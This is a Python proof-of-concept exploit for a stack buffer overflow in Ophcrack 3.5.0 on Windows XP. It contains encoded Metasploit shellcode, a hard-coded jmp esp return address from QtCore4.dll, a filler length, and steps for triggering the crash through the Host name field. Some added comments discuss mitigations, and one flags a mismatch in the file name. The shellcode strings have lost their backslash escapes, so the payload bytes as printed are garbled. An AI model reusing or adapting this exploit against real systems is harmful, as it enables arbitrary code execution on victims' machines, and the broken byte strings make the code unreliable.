
# Title : Ophcrack 3.5.0 - Local Code Execution BOF
# Published : 2013-05-21
# Author :


# Exploit Title: ophcrack v3.5.0 - Local Code Execution BOF
# Date: 21.05.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage:  http://ophcrack.sourceforge.net/
# Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-win32-installer-3.5.0.exe
# Version: 3.5.0 
# Tested on: Windows XP SP3 Eng (32bits)

#!/usr/bin/python

#Stack based buffer overflow - direct EIP overwrite in this case (SEH based exploitation is possible as well)
#In order to exploit go to: Load -> Remote SAM -> put the content of buffer.txt file generated by this exploit into the "Host name:" field -> "Don't send" once you see the crash.
#pwdump6_setup.exe will be run by ophcrack. It will crash and execute the payload.
#pwdump6_setup itself does not appear to be exploitable outside of ophcrack.
#Kudos to Hostess for pointing me to http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html



shellcode = (
# Payload string appended after the return-address overwrite built further down.
# Per the author's generator line (kept below): Metasploit windows/exec with
# CMD=calc (a benign proof-of-concept command), EXITFUNC=seh, run through the
# x86/alpha_mixed encoder, which is why every byte listed here falls in the
# printable range. Presumably that is needed for the payload to survive the
# text "Host name:" field described in the header — not verified here.
# Defensive note: an input of this length in a host-name field is exactly
# what a maximum-length check on that field would reject before it reaches
# the helper process.
#windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alpha_mixed bufferregister=esp -t c
"x54x59x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41x6b"
"x41x41x51x32x41x42x32x42x42x30x42x42x41x42x58"
"x50x38x41x42x75x4ax49x69x6cx79x78x6cx49x57x70"
"x65x50x65x50x75x30x6ex69x7ax45x44x71x7ax72x75"
"x34x4ex6bx46x32x30x30x4ex6bx56x32x34x4cx4ex6b"
"x36x32x54x54x4ex6bx73x42x71x38x36x6fx48x37x32"
"x6ax36x46x75x61x69x6fx34x71x49x50x6ex4cx55x6c"
"x30x61x61x6cx45x52x44x6cx57x50x6fx31x78x4fx56"
"x6dx47x71x69x57x7ax42x6ax50x31x42x46x37x4ex6b"
"x71x42x66x70x6ex6bx43x72x35x6cx66x61x58x50x6e"
"x6bx37x30x54x38x6ex65x6fx30x31x64x53x7ax56x61"
"x4ex30x66x30x6ex6bx50x48x65x48x4ex6bx30x58x65"
"x70x46x61x7ax73x6ax43x35x6cx43x79x6ex6bx46x54"
"x6ex6bx75x51x7ax76x75x61x49x6fx66x51x6bx70x4c"
"x6cx49x51x68x4fx66x6dx77x71x48x47x44x78x6bx50"
"x62x55x7ax54x34x43x61x6dx4ax58x67x4bx53x4dx66"
"x44x71x65x49x72x72x78x6ex6bx73x68x44x64x53x31"
"x5ax73x43x56x6ex6bx54x4cx30x4bx4ex6bx73x68x35"
"x4cx56x61x4bx63x4cx4bx66x64x6cx4bx46x61x58x50"
"x4fx79x32x64x56x44x54x64x73x6bx63x6bx65x31x31"
"x49x72x7ax62x71x49x6fx69x70x62x78x31x4fx30x5a"
"x6cx4bx44x52x5ax4bx4bx36x51x4dx53x5ax67x71x6c"
"x4dx4bx35x78x39x75x50x35x50x45x50x42x70x30x68"
"x35x61x6ex6bx42x4fx4dx57x79x6fx69x45x4dx6bx6b"
"x4ex66x6ex54x72x59x7ax43x58x59x36x4dx45x6dx6d"
"x4fx6dx39x6fx5ax75x75x6cx34x46x73x4cx57x7ax6d"
"x50x4bx4bx49x70x61x65x44x45x4fx4bx61x57x74x53"
"x32x52x52x4fx31x7ax43x30x36x33x39x6fx49x45x50"
"x63x65x31x32x4cx63x53x43x30x41x41")

#!mona jmp -r esp -cp ascii -> 0x6e2a2936 : jmp esp  asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll]


# Return-address overwrite. The mona line above records 0x6e2a2936 as a
# `jmp esp` inside QtCore4.dll; the four bytes here are that address in
# little-endian order. Mitigation note: a hard-coded address like this only
# stays valid while the module loads at a fixed base — shipping QtCore4.dll
# with ASLR/DEP enabled (or rebasing it) invalidates it, and a length check
# on the "Host name:" field stops the input before the overflow.
jmp="x36x29x2ax6e" 
# 497 bytes of filler up to the saved return address (offset as determined by
# the author; not re-derived here), then the overwrite, then the payload.
buffer = "A"*497 + jmp + shellcode

# Echo the buffer to stdout as well as writing it to disk.
print(buffer)

# NOTE(review): the header comment says buffer.txt is generated; the file
# actually written is exploit.txt. `file` also shadows the builtin, and a
# `with open(...)` block would close the handle even if write() raised —
# both left as-is here.
file = open('exploit.txt','w')
file.write(buffer)
file.close()